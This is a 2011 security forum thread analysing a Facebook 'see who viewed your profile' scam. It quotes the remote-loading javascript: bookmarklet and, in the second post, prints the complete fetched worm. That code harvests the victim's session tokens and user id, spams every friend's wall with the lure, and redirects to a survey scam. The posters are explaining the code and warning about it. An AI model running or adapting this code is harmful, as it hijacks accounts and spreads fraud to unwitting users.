-
May 16th, 2011, 04:15 PM
#1
what does this code mean
There is a javascript code going arounf Facebook and I am curious as what it does they give an example but it didn't work. Also, I don't want to run any old code on this machine. Thank you, Mike
Code:
javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://bdatero.info/y.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();
I am not a coder but network guy all help is greatly appreciated.
Here is the URL: http://tadero.info/engl.php
-
May 16th, 2011, 04:56 PM
#2
it's getting its source from here:
'http://bdatero.info/y.js?'+(Math.random())
and doesn't have any actual code in itself other than referring to the source on that website. My guess is that the Math.random() is used in the URL to make it harder for firefox and other websites to warn as unsafe? I'm not sure though, as they could just set the whole domain as 'unsafe' to produce the warning. It looks sketchy to me. I went to the link directly in my browser, as to not run the script.
var message = "Awesome! A new way to see your profile's full stats. I just checked how many people have viewed my profile and how much time I spent on FB this month . Scan your profile and let me know how popular YOU are.";
var jsText = "http://tdadero.info/gop.php";
var myText = "Scan Profile";
var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var friends = new Array();
gf = new XMLHttpRequest();
gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false);
gf.send();
if(gf.readyState!=4){ }else{
data = eval('(' + gf.responseText.substr(9) + ')');
if(data.error){ }else{
friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
}
}
for(var i=0; i<friends.length; i++){
var httpwp = new XMLHttpRequest();
var urlwp = "/fbml/ajax/prompt_feed.php?__a=1";
var paramswp = "&__d=1&app_id=6261817190&extern=1&" +
"&post_form_id=" + post_form_id +
"&fb_dtsg=" + fb_dtsg +
"&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) +
"&feed_info[action_links][0][text]=" + encodeURIComponent(myText) +
"&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid +
"&user_message=" + message;
httpwp.open("POST", urlwp, true);
httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
httpwp.setRequestHeader("Content-length", paramswp.length);
httpwp.setRequestHeader("Connection", "keep-alive");
httpwp.onreadystatechange = function(){
if (httpwp.readyState == 4 && httpwp.status == 200){
}
}
httpwp.send(paramswp);
}
alert("Account verification failed. Please proceed to next step to verify your account.");
window.location = "http://basopu.info/poli/indexen.php"
I'm not very experienced with POST and ajax, but my guess is this posts a message to facebook under your id, and then sends you to this page
saying that you couldn't verify your account. This page then asks you to complete a survey, which may be the point of this script as a whole, but there may be other things going on at that site as well, as I never took the time to get passed the survey popup to see what else the website had in store
-
May 16th, 2011, 05:15 PM
#3
Optional extra', :halo:
javascript :R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',50); void(0)
-
May 16th, 2011, 05:39 PM
#4
I've got the actual Source for this .js xss, i've attached a .txt file it contains both parts of the 0-day that was being used.
This has sinced been patched by FaceBook, so it's pretty harmless atm.
Last edited by HYBR|D; October 14th, 2011 at 04:32 AM.
-
May 19th, 2011, 07:59 AM
#5
It's one of those supposedly "stalker" apps that will allow you to see who's been watching your profile.
NONE of those scripts work because FB doesn't expose that data.
http://arstechnica.com/web/news/2011...avoid-them.ars
Oliver's Law:
Experience is something you don't get until just after you need it.
Similar Threads
-
By Juridian in forum The Security Tutorials Forum
Replies: 3
Last Post: February 12th, 2006, 04:40 PM
-
By Tiger Shark in forum Microsoft Security Discussions
Replies: 5
Last Post: January 14th, 2005, 08:47 PM
-
By tampabay420 in forum Programming Security
Replies: 2
Last Post: February 14th, 2003, 02:36 PM
-
Replies: 1
Last Post: July 15th, 2002, 03:46 AM
-
By Noble Hamlet in forum AntiOnline's General Chit Chat
Replies: 1100
Last Post: March 17th, 2002, 09:38 AM
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|